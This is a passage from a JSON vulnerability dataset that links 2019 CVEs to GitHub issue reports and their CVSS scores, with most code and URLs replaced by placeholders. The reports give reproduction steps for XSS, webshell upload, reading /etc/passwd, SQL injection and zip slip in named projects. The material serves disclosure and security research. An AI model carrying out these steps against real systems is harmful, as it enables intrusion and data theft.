  89703. "CVE_ID": "CVE-2019-11084",
  89704. "Issue_Url_old": "https://github.com/gbraad/gauth/issues/110",
  89705. "Issue_Url_new": "https://github.com/gbraad/gauth/issues/110",
  89706. "Repo_new": "gbraad/gauth",
  89707. "Issue_Created_At": "2018-08-22T08:21:45Z",
  89708. "description": "Self XSS. Minor security niggle but the name field is vulnerable to self XSS. No validation or escaping, so now the hosted copy plays me the Harlem Shake whenever I visit your site. This could be used by someone who obtains physical access to a machine, or malicious browser extension, to gain persistent access to users's TOTP codes. Indeed it could easily be scripted to immediately exfiltrate any new codes stored. Alternative, perhaps more plausible scenario is offering TOTP and providing a APITAG button to encourage them to copy the site name, and polluting the content of the copy and paste buffer with the attack code e.g. \" EMAILTAG xample.com APITAG \" The name should be properly escaped on output. Consider restricting the set of valid characters in the name. Consider using a Content Security Policy on the hosted copy to mitigate (and potentially detect via reporturi) existing and unforeseen XSS issues.",
  89709. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  89710. "severity": "MEDIUM",
  89711. "baseScore": 6.1,
  89712. "impactScore": 2.7,
  89713. "exploitabilityScore": 2.8
  89714. },
  89715. {
  89716. "CVE_ID": "CVE-2019-11344",
  89717. "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/72",
  89718. "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/72",
  89719. "Repo_new": "pluck-cms/pluck",
  89720. "Issue_Created_At": "2019-04-09T14:45:54Z",
  89721. "description": "file upload vulnerability in PATHTAG Location: URLTAG Code: ERRORTAG When the uploaded file hits the suffix in APITAG , the file will be renamed to APITAG , and missed APITAG will not be renamed. So you can upload a webshell by overriding the APITAG file. Step1. Upload a file APITAG File content: image URLTAG Step2. Upload file APITAG File content: image URLTAG Step3. Request getshell URLTAG",
  89722. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  89723. "severity": "CRITICAL",
  89724. "baseScore": 9.8,
  89725. "impactScore": 5.9,
  89726. "exploitabilityScore": 3.9
  89727. },
  89728. {
  89729. "CVE_ID": "CVE-2019-11470",
  89730. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1472",
  89731. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1472",
  89732. "Repo_new": "imagemagick/imagemagick",
  89733. "Issue_Created_At": "2019-02-05T04:29:35Z",
  89734. "description": "Incorrect parsing Cineon causing convert to take ridiculous time. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description Cineon image may be mistakenly parsed with incorrect pixel information, causing converting to take too much CPU resource. Steps to Reproduce convert c.cin /tmp/test.tmp ERRORTAG FILETAG System Configuration APITAG version NUMBERTAG Q NUMBERTAG b3bdb NUMBERTAG b) Environment APITAG system, version and so on): Ubuntu NUMBERTAG Additional information: Version NUMBERTAG Q NUMBERTAG seems fine with error message \"width or height exceeds limit `c.cin'\". APITAG",
  89735. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  89736. "severity": "MEDIUM",
  89737. "baseScore": 6.5,
  89738. "impactScore": 3.6,
  89739. "exploitabilityScore": 2.8
  89740. },
  89741. {
  89742. "CVE_ID": "CVE-2019-13038",
  89743. "Issue_Url_old": "https://github.com/Uninett/mod_auth_mellon/issues/35",
  89744. "Issue_Url_new": "https://github.com/uninett/mod_auth_mellon/issues/35",
  89745. "Repo_new": "uninett/mod_auth_mellon",
  89746. "Issue_Created_At": "2015-05-15T18:06:24Z",
  89747. "description": "Open Redirection issue. Hello, In IDP initiated login for Mellon, APITAG parameter could be really anything and that gets added as APITAG Once assertion is consumed, mellon redirects to APITAG arbitrarily. This leads to Open Redirect security issue. Ideally, redirection code should check if its in same domain. Can this be tracked? For example, URLTAG to IDP> Will redirect to Google after successful assertion. This would also lead to Phishing kind of attack.",
  89748. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  89749. "severity": "MEDIUM",
  89750. "baseScore": 6.1,
  89751. "impactScore": 2.7,
  89752. "exploitabilityScore": 2.8
  89753. },
  89754. {
  89755. "CVE_ID": "CVE-2019-13617",
  89756. "Issue_Url_old": "https://github.com/nginx/njs/issues/174",
  89757. "Issue_Url_new": "https://github.com/nginx/njs/issues/174",
  89758. "Repo_new": "nginx/njs",
  89759. "Issue_Created_At": "2019-06-03T14:46:39Z",
  89760. "description": "heap buffer overflow in APITAG Hello, I am shuoz of alpha lab of topsec. I fuzz njs and found a heap overflow bug. ./njs FILETAG ERRORTAG pocfile: FILETAG",
  89761. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  89762. "severity": "MEDIUM",
  89763. "baseScore": 6.5,
  89764. "impactScore": 3.6,
  89765. "exploitabilityScore": 2.8
  89766. },
  89767. {
  89768. "CVE_ID": "CVE-2019-13915",
  89769. "Issue_Url_old": "https://github.com/b3log/wide/issues/355",
  89770. "Issue_Url_new": "https://github.com/b3log/wide/issues/355",
  89771. "Repo_new": "b3log/wide",
  89772. "Issue_Created_At": "2019-05-15T15:44:13Z",
  89773. "description": "Vulnerability: read and write to any file. \u63cf\u8ff0\u95ee\u9898 Sensitive system files can be read through code or soft links. \u91cd\u73b0\u6b65\u9aa4 Method NUMBERTAG by code NUMBERTAG Writing code in the editor to read any file, such as /etc/passwd NUMBERTAG Click the green button at the top to compile and run about three times (I don't know why three NUMBERTAG etc/passwd will be read out Method NUMBERTAG by git or compressed file NUMBERTAG Create a soft link to a sensitive file, such as /etc/passwd, on a Linux APITAG NUMBERTAG compress the soft link APITAG NUMBERTAG upload zip and unzip it. when you open a link file, the local file that you point to is opened NUMBERTAG change and save the file if the user running wide has permission \u671f\u5f85\u7684\u7ed3\u679c Sensitive system files should not be read. \u622a\u5c4f\u6216\u5f55\u50cf FILETAG FILETAG",
  89774. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  89775. "severity": "HIGH",
  89776. "baseScore": 7.5,
  89777. "impactScore": 3.6,
  89778. "exploitabilityScore": 3.9
  89779. },
  89780. {
  89781. "CVE_ID": "CVE-2019-13984",
  89782. "Issue_Url_old": "https://github.com/directus/api/issues/981",
  89783. "Issue_Url_new": "https://github.com/directus/v8-archive/issues/981",
  89784. "Repo_new": "directus/v8-archive",
  89785. "Issue_Created_At": "2019-05-28T20:28:44Z",
  89786. "description": "FILETAG A malicious user can use this functionality in order to upload a malicious file and to send it by a legitimate link to other victims and to attack them using their trust to the system. It was also found that file size limitations are permit to users upload large size files APITAG NUMBERTAG MB) in cases even when a size of uploaded file not required to be large as for example image for the user\u2019s avatar. FILETAG What problem does this feature solve? Fixes security hole. How do you think this should be implemented? Do now allow any access to uploaded files without any authentication. Restrict file extensions using whitelist approach. The file types allowed to be uploaded should be restricted to only those that are necessary for business functionality. The application should perform filtering and content checking on any files which are uploaded to the server. Files should be thoroughly scanned and validated before being made available to other users. Limit the file size to a reasonable maximum value in order to prevent denial of service attacks (on file space or other web application\u2019s functions such as the image resizer). Use a virus scanner on the server (if it is applicable). Or, if the contents of files are not confidential, a free virus scanner website can be used. In this case, file should be stored with a random name and without any extension on the server first, and after the virus checking (uploading to a free virus scanner website and getting back the result), it can be renamed to its specific name and extension. Implement an authorization mechanism that validate if user authorized to view or download the specific file. Would you be willing to work on this? Maybe, with help/guidance from Directus team.",
  89787. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  89788. "severity": "HIGH",
  89789. "baseScore": 8.8,
  89790. "impactScore": 5.9,
  89791. "exploitabilityScore": 2.8
  89792. },
  89793. {
  89794. "CVE_ID": "CVE-2019-15047",
  89795. "Issue_Url_old": "https://github.com/axiomatic-systems/bento4/issues/408",
  89796. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/408",
  89797. "Repo_new": "axiomatic-systems/bento4",
  89798. "Issue_Created_At": "2019-07-19T06:39:22Z",
  89799. "description": "2 Potential Buffer Overflow Vulnerabilities. bento4 version bento NUMBERTAG description APITAG download link FILETAG others please send email to EMAILTAG if you have any questions. APITAG EMAILTAG pp NUMBERTAG heap buffer overflow description An issue was discovered in bento NUMBERTAG There is a/an heap buffer overflow in function APITAG at APITAG NUMBERTAG commandline mp NUMBERTAG aac APITAG a.aac source CODETAG bug report ERRORTAG others from fuzz project pwd bento4 mp NUMBERTAG aac NUMBERTAG crash name APITAG EMAILTAG pp NUMBERTAG heap buffer overflow Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions. input input URLTAG APITAG EMAILTAG pp NUMBERTAG heap buffer overflow description An issue was discovered in bento NUMBERTAG There is a/an heap buffer overflow in function APITAG at APITAG NUMBERTAG commandline mp NUMBERTAG aac APITAG a.aac source CODETAG bug report ERRORTAG others from fuzz project pwd bento4 mp NUMBERTAG aac NUMBERTAG crash name APITAG EMAILTAG pp NUMBERTAG heap buffer overflow Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions. input input URLTAG",
  89800. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  89801. "severity": "HIGH",
  89802. "baseScore": 8.8,
  89803. "impactScore": 5.9,
  89804. "exploitabilityScore": 2.8
  89805. },
  89806. {
  89807. "CVE_ID": "CVE-2019-15048",
  89808. "Issue_Url_old": "https://github.com/axiomatic-systems/bento4/issues/409",
  89809. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/409",
  89810. "Repo_new": "axiomatic-systems/bento4",
  89811. "Issue_Created_At": "2019-07-31T05:24:56Z",
  89812. "description": "3 potential vulerabilities. bento4 version bento NUMBERTAG description txt None download link FILETAG others please send email to EMAILTAG if you have any questions. APITAG EMAILTAG pp NUMBERTAG heap buffer overflow description An issue was discovered in bento NUMBERTAG There is a/an heap buffer overflow in function APITAG at APITAG NUMBERTAG commandline mp4compact APITAG a.mp4 source ERRORTAG bug report ERRORTAG others from fuzz project pwd bento4 mp4compact NUMBERTAG crash name APITAG EMAILTAG pp NUMBERTAG heap buffer overflow Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions. input input URLTAG APITAG EMAILTAG pp NUMBERTAG heap buffer overflow description An issue was discovered in bento NUMBERTAG There is a/an heap buffer overflow in function APITAG at APITAG NUMBERTAG commandline mp4compact verbose APITAG a.mp4 source CODETAG bug report ERRORTAG others from fuzz project pwd bento4 mp4compact NUMBERTAG crash name APITAG EMAILTAG pp NUMBERTAG heap buffer overflow Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions. input input URLTAG APITAG EMAILTAG pp NUMBERTAG heap buffer overflow description An issue was discovered in bento NUMBERTAG There is a/an heap buffer overflow in function APITAG at APITAG NUMBERTAG commandline mp4compact verbose APITAG a.mp4 source ERRORTAG bug report ERRORTAG others from fuzz project pwd bento4 mp4compact NUMBERTAG crash name APITAG EMAILTAG pp NUMBERTAG heap buffer overflow Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions. input input URLTAG",
  89813. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  89814. "severity": "HIGH",
  89815. "baseScore": 8.8,
  89816. "impactScore": 5.9,
  89817. "exploitabilityScore": 2.8
  89818. },
  89819. {
  89820. "CVE_ID": "CVE-2019-15562",
  89821. "Issue_Url_old": "https://github.com/go-gorm/gorm/issues/2517",
  89822. "Issue_Url_new": "https://github.com/go-gorm/gorm/issues/2517",
  89823. "Repo_new": "go-gorm/gorm",
  89824. "Issue_Created_At": "2019-06-21T08:54:24Z",
  89825. "description": "SQL injection in Gorm With using first and find.. What version of Go are you using ( go version )? latest Which database and its version are you using? postgress latest and gorm latest Blind Sql injection localhost NUMBERTAG user?id=id NUMBERTAG or NUMBERTAG ERRORTAG Need to runnable with FILETAG or please provides your config. ERRORTAG",
  89826. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  89827. "severity": "CRITICAL",
  89828. "baseScore": 9.8,
  89829. "impactScore": 5.9,
  89830. "exploitabilityScore": 3.9
  89831. },
  89832. {
  89833. "CVE_ID": "CVE-2019-15939",
  89834. "Issue_Url_old": "https://github.com/OpenCV/opencv/issues/15287",
  89835. "Issue_Url_new": "https://github.com/opencv/opencv/issues/15287",
  89836. "Repo_new": "opencv/opencv",
  89837. "Issue_Created_At": "2019-08-13T07:02:59Z",
  89838. "description": "Floating Point Exception in APITAG APITAG System information (version) APITAG NUMBERTAG Operating System / Platform => Windows NUMBERTAG Bit Compiler => Visual Studio NUMBERTAG APITAG NUMBERTAG Operating System / Platform => Ubuntu NUMBERTAG LTS Compiler NUMBERTAG Detailed description An issue was discovered in openc NUMBERTAG There is a FPE in APITAG DEBUG CODETAG ASAN report ERRORTAG Steps to reproduce APITAG APITAG FILETAG",
  89839. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
  89840. "severity": "MEDIUM",
  89841. "baseScore": 5.9,
  89842. "impactScore": 3.6,
  89843. "exploitabilityScore": 2.2
  89844. },
  89845. {
  89846. "CVE_ID": "CVE-2019-16511",
  89847. "Issue_Url_old": "https://github.com/wixtoolset/issues/issues/6075",
  89848. "Issue_Url_new": "https://github.com/wixtoolset/issues/issues/6075",
  89849. "Repo_new": "wixtoolset/issues",
  89850. "Issue_Created_At": "2019-09-12T18:10:14Z",
  89851. "description": "DTF vulnerable to APITAG Slip\". Please provide answers to the following questions to help us narrow down, reproduce, and fix the problem. Fill out one section and delete the others. Which version of APITAG are you building with? > APITAG NUMBERTAG Which version of Visual Studio are you building with (if any)? > N/A Which version of the APITAG Toolset Visual Studio Extension are you building with (if any)? > N/A Which version of .NET are you building with? > Any If the problem occurs when installing your packages built with APITAG what is the version of Windows the package is running on? > N/A Describe the problem and the steps to reproduce it. > A maliciously crafted cabinet or zip file can be created with traversal paths in the archived file names. For example, APITAG . DTF's APITAG will concatenate the archived file path with a provided base directory, such that the traversal path can place the file outside the provided base directory and possibly overwriting the user's files. This is known as Zip Slip URLTAG . Describe the behavior you expected and how it differed from the actual behavior. > DTF should not write files outside the extraction folder. > This issue was originally reported by Devin Casadey.",
  89852. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  89853. "severity": "MEDIUM",
  89854. "baseScore": 5.5,
  89855. "impactScore": 3.6,
  89856. "exploitabilityScore": 1.8
  89857. },
  89858. {
  89859. "CVE_ID": "CVE-2019-17414",
  89860. "Issue_Url_old": "https://github.com/tinylcy/vino/issues/9",
  89861. "Issue_Url_new": "https://github.com/tinylcy/vino/issues/9",
  89862. "Repo_new": "tinylcy/vino",
  89863. "Issue_Created_At": "2019-09-12T05:23:13Z",
  89864. "description": "Application crashes when getting a long url.. Steps to reproduce: URLTAG Result: vn_get_string error: Resource temporarily unavailable.",
  89865. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  89866. "severity": "HIGH",
  89867. "baseScore": 7.5,
  89868. "impactScore": 3.6,
  89869. "exploitabilityScore": 3.9
  89870. },
  89871. {
  89872. "CVE_ID": "CVE-2019-19011",
  89873. "Issue_Url_old": "https://github.com/miniupnp/ngiflib/issues/16",
  89874. "Issue_Url_new": "https://github.com/miniupnp/ngiflib/issues/16",
  89875. "Repo_new": "miniupnp/ngiflib",
  89876. "Issue_Created_At": "2019-10-30T18:20:15Z",
  89877. "description": "Segmentation Fault in ngiflib.c. We found Segmentation Fault issue in gif2tga binary and gif2tga is complied with clang enabling ASAN. Machine Setup Machine : Ubuntu NUMBERTAG LTS gcc version NUMBERTAG APITAG NUMBERTAG APITAG Commit NUMBERTAG d NUMBERTAG Command : ./gif2tga $POC POC : FILETAG ASAN Output ERRORTAG",
  89878. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  89879. "severity": "HIGH",
  89880. "baseScore": 7.5,
  89881. "impactScore": 3.6,
  89882. "exploitabilityScore": 3.9
  89883. },
  89884. {
  89885. "CVE_ID": "CVE-2019-20803",
  89886. "Issue_Url_old": "https://github.com/GilaCMS/gila/issues/56",
  89887. "Issue_Url_new": "https://github.com/gilacms/gila/issues/56",
  89888. "Repo_new": "gilacms/gila",
  89889. "Issue_Created_At": "2019-10-29T14:30:35Z",
  89890. "description": "Cross Site Scripting (XSS) . Describe the bug XSS when a admin click on the link bellow, the g_preview_theme parameter not encoding the double quotes, an attacker could trick the admin to click on that link.. URLTAG To Reproduce Steps to reproduce the behavior NUMBERTAG Go to ' URLTAG NUMBERTAG Click on 'edit NUMBERTAG With a web proxy like burp intercept that request, and after id= parameter put \" \"+> APITAG alert NUMBERTAG APITAG NUMBERTAG See the alert on browser.. Screenshots If applicable, add screenshots to help explain your problem. Desktop (please complete the following information): Browser Firefox Version NUMBERTAG bit) Additional context In fact the attacker could trick any admin to click on URLTAG .. and execute javascript..",
  89891. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  89892. "severity": "MEDIUM",
  89893. "baseScore": 6.1,
  89894. "impactScore": 2.7,
  89895. "exploitabilityScore": 2.8
  89896. },
  89897. {
  89898. "CVE_ID": "CVE-2019-6129",
  89899. "Issue_Url_old": "https://github.com/glennrp/libpng/issues/269",
  89900. "Issue_Url_new": "https://github.com/glennrp/libpng/issues/269",
  89901. "Repo_new": "glennrp/libpng",
  89902. "Issue_Created_At": "2019-01-05T07:23:28Z",
  89903. "description": "memory leak in png_create_info_struct. Hi,libpng team. there is a memory leak in the file APITAG of function png_create_info_struct. the bug is trigered by APITAG FILETAG the asan debug info is as follows: APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fe NUMBERTAG bf NUMBERTAG in malloc ( PATHTAG NUMBERTAG f NUMBERTAG in png_create_info_struct PATHTAG SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). URLTAG",
  89904. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  89905. "severity": "MEDIUM",
  89906. "baseScore": 6.5,
  89907. "impactScore": 3.6,
  89908. "exploitabilityScore": 2.8
  89909. },
  89910. {
  89911. "CVE_ID": "CVE-2019-6283",
  89912. "Issue_Url_old": "https://github.com/sass/libsass/issues/2814",
  89913. "Issue_Url_new": "https://github.com/sass/libsass/issues/2814",
  89914. "Repo_new": "sass/libsass",
  89915. "Issue_Created_At": "2019-01-14T05:26:25Z",
  89916. "description": "APITAG heap buffer overflow PATHTAG in APITAG const ). A heap buffer overflow in APITAG in APITAG const ) Compile and reproduce: APITAG ldd: $ ldd sassc linux APITAG NUMBERTAG fffc NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG e NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG a5d NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG APITAG => PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG lib NUMBERTAG ld linu NUMBERTAG so NUMBERTAG f NUMBERTAG System information: APITAG Version: libsass NUMBERTAG sassc NUMBERTAG Poc: FILETAG Run: APITAG ASAN: APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ac at pc NUMBERTAG dfd bp NUMBERTAG ffcd8af NUMBERTAG sp NUMBERTAG ffcd8af NUMBERTAG READ of size NUMBERTAG at NUMBERTAG ac thread T NUMBERTAG dfc in APITAG const ) PATHTAG NUMBERTAG fd1 in char const APITAG APITAG &(char const APITAG const ))>(char const ) PATHTAG NUMBERTAG fd1 in char const APITAG const APITAG APITAG &(char const APITAG const ))>(char const ))>(char const ) PATHTAG NUMBERTAG fd1 in char const APITAG &(char const APITAG APITAG &(char const APITAG const ))>(char const ))>(char const ) PATHTAG NUMBERTAG fd1 in char const APITAG APITAG &(char const APITAG APITAG &(char const APITAG const ))>(char const ))>(char const ) PATHTAG NUMBERTAG fd1 in char const APITAG const APITAG &(char const APITAG const ))>(char const )), APITAG APITAG &(char const APITAG APITAG &(char const APITAG const ))>(char const ))>(char const ) PATHTAG NUMBERTAG fd1 in char const APITAG &(char const APITAG &(char const APITAG const ))>(char const )), APITAG APITAG &(char const APITAG APITAG &(char const APITAG const ))>(char const ))>(char const ) PATHTAG NUMBERTAG fd1 in char const APITAG const APITAG &(char const APITAG &(char const APITAG const ))>(char const )), APITAG APITAG &(char const APITAG APITAG 
&(char const APITAG const ))>(char const ))>(char const )), &(char const APITAG const APITAG const APITAG const )), &(char const APITAG const )), &(char const APITAG const ))>(char const ))>(char const ))>(char const ) PATHTAG NUMBERTAG a6 in char const APITAG const APITAG const APITAG &(char const APITAG &(char const APITAG const ))>(char const )), APITAG APITAG &(char const APITAG APITAG &(char const APITAG const ))>(char const ))>(char const )), &(char const APITAG const APITAG const APITAG const )), &(char const APITAG const )), &(char const APITAG const ))>(char const ))>(char const ))>(char const ))>(char const ) PATHTAG NUMBERTAG a6 in APITAG const ) PATHTAG NUMBERTAG fedcc in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG eee NUMBERTAG in APITAG PATHTAG NUMBERTAG ea NUMBERTAG f in APITAG PATHTAG NUMBERTAG d5b in APITAG const&, APITAG const&) PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG ) PATHTAG NUMBERTAG b NUMBERTAG in sass_compiler_parse PATHTAG NUMBERTAG b NUMBERTAG c2 in APITAG , APITAG ) PATHTAG NUMBERTAG b NUMBERTAG ac in sass_compile_data_context PATHTAG NUMBERTAG a NUMBERTAG in compile_stdin PATHTAG NUMBERTAG a NUMBERTAG ed in main PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG aad NUMBERTAG in _start ( PATHTAG NUMBERTAG ac is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG in realloc PATHTAG NUMBERTAG a6f NUMBERTAG in compile_stdin PATHTAG NUMBERTAG a NUMBERTAG ed in main PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG f in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in APITAG const ) Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff NUMBERTAG e NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG f NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa 
NUMBERTAG fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fd fd fd fa fa fa fd fd NUMBERTAG c NUMBERTAG fff NUMBERTAG fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd NUMBERTAG c NUMBERTAG fff NUMBERTAG fd fa fa fa fd fd fd fa fa fa fd fd fd fd fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
  89917. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  89918. "severity": "MEDIUM",
  89919. "baseScore": 6.5,
  89920. "impactScore": 3.6,
  89921. "exploitabilityScore": 2.8
  89922. },
  89923. {
  89924. "CVE_ID": "CVE-2019-6292",
  89925. "Issue_Url_old": "https://github.com/jbeder/yaml-cpp/issues/657",
  89926. "Issue_Url_new": "https://github.com/jbeder/yaml-cpp/issues/657",
  89927. "Repo_new": "jbeder/yaml-cpp",
  89928. "Issue_Created_At": "2019-01-02T14:29:02Z",
  89929. "description": "Recursive Stack Frames: APITAG APITAG APITAG APITAG APITAG Hi there, An issue was discovered in APITAG as distributed in yaml cpp NUMBERTAG Stack Exhaustion occurs in the APITAG and there is a stack consumption problem caused by recursive stack frames: APITAG APITAG APITAG APITAG APITAG Here is the POC file. Please use \"./parse $POC\" to reproduce the bug FILETAG $git log ERRORTAG I have confirmed them with address sanitizer too. ERRORTAG",
  89930. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  89931. "severity": "MEDIUM",
  89932. "baseScore": 6.5,
  89933. "impactScore": 3.6,
  89934. "exploitabilityScore": 2.8
  89935. },
  89936. {
  89937. "CVE_ID": "CVE-2019-6439",
  89938. "Issue_Url_old": "https://github.com/wolfSSL/wolfssl/issues/2032",
  89939. "Issue_Url_new": "https://github.com/wolfssl/wolfssl/issues/2032",
  89940. "Repo_new": "wolfssl/wolfssl",
  89941. "Issue_Created_At": "2019-01-15T20:11:17Z",
  89942. "description": "heap buffer overflow [tls_bench NUMBERTAG ff NUMBERTAG Hi Team, Summary I have compiled APITAG using clang and a heap based buffer overflow is observed in APITAG System info: APITAG ASAN ERRORTAG",
  89943. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  89944. "severity": "CRITICAL",
  89945. "baseScore": 9.8,
  89946. "impactScore": 5.9,
  89947. "exploitabilityScore": 3.9
  89948. },
  89949. {
  89950. "CVE_ID": "CVE-2019-7328",
  89951. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2449",
  89952. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2449",
  89953. "Repo_new": "zoneminder/zoneminder",
  89954. "Issue_Created_At": "2019-01-24T19:26:47Z",
  89955. "description": "Reflected Cross Site Scripting(XSS) FILETAG NUMBERTAG Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view frame , insecurely prints the scale parameter value on the webpage that is without applying any proper filtration, leading to XSS. To Reproduce Affected URL : URLTAG APITAG \"> APITAG Payload used ERRORTAG Navigate to the Affected URL, Payload would be triggered. Affected source Files: PATHTAG PATHTAG APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  89956. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  89957. "severity": "MEDIUM",
  89958. "baseScore": 6.1,
  89959. "impactScore": 2.7,
  89960. "exploitabilityScore": 2.8
  89961. },
  89962. {
  89963. "CVE_ID": "CVE-2019-7331",
  89964. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2451",
  89965. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2451",
  89966. "Repo_new": "zoneminder/zoneminder",
  89967. "Issue_Created_At": "2019-01-24T19:40:22Z",
  89968. "description": "Self Stored Cross Site Scripting (XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug A user can edit an existing monitor thereby modifying various misc properties, one of them being signal check color . There exists no input validation & output filtration, leaving it vulnerable to HTML Injection, XSS attack. To Reproduce Affected URL : URLTAG Payload used APITAG Navigate to the Affected URL & modify the Signal check Color field with the provided payload & click on save. Click on the color box, XSS would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  89969. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  89970. "severity": "MEDIUM",
  89971. "baseScore": 6.1,
  89972. "impactScore": 2.7,
  89973. "exploitabilityScore": 2.8
  89974. },
  89975. {
  89976. "CVE_ID": "CVE-2019-7339",
  89977. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2460",
  89978. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2460",
  89979. "Repo_new": "zoneminder/zoneminder",
  89980. "Issue_Created_At": "2019-01-24T20:29:35Z",
  89981. "description": "POST Reflected Cross Site Scripting(XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The parameter value level , is displayed insecurely, without applying any proper output filtration leading to XSS To Reproduce Affected URL : FILETAG POST Data ERRORTAG Payload used ERRORTAG Navigate to the Affected URL, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  89982. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  89983. "severity": "MEDIUM",
